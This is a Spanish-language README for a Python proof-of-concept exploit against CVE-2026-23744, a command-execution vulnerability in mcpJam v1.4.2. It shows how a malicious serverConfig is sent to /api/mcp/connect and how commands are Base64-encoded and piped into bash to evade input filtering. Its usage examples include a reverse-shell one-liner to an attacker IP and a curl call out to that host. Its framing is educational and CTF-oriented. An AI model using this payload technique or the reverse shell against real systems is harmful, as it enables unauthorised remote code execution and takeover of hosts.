
cve-2026-23744 exploit en Python
Un exploit de prueba de concepto en Python 3 para CVE-2026-23744, una vulnerabilidad de ejecución arbitraria de comandos que afecta a mcpJam v1.4.2.
Esta utilidad automatiza la entrega de payloads codificando de forma transparente los comandos en Base64 antes de la transmisión, ayudando a eludir la validación restrictiva de entrada y los mecanismos de filtrado de caracteres. El payload se descodifica y ejecuta a través de un envoltorio /bin/bash en el sistema objetivo.
Los comandos se codifican automáticamente antes de la transmisión, mejorando la fiabilidad al apuntar a aplicaciones que imponen una validación estricta de entrada o restricciones de caracteres.
Admite la ejecución arbitraria de comandos, incluyendo:
sh, bash, nc, etc.)Muestra:
Esto simplifica la resolución de problemas y la validación del exploit.
Suprime las advertencias de verificación de certificados, permitiendo la interacción con objetivos que utilizan certificados SSL autofirmados o no confiables.
Instale la dependencia requerida:
pip install requests
python3 exploit.py <target_url> "<command>"
python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"
python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"
El exploit apunta al endpoint /api/mcp/connect creando un objeto serverConfig malicioso.
En lugar de transmitir comandos directamente, el payload se transforma en una cadena codificada en Base64 y se ejecuta a través de Bash:
"args": [
"-c",
f"echo {base64_payload} | base64 -d | bash"
]
Este enfoque ayuda a evadir el filtrado a nivel de aplicación mientras asegura que el payload se descodifique y ejecute completamente en el host objetivo.
serverConfig.base64 -d./bin/bash.[!WARNING] Este proyecto se proporciona únicamente con fines educativos, evaluaciones de seguridad autorizadas y entornos Capture The Flag (CTF).
El uso no autorizado contra sistemas para los cuales no tiene permiso explícito es ilegal y poco ético. El autor no asume ninguna responsabilidad por cualquier mal uso, daños o consecuencias legales derivadas del uso de este software.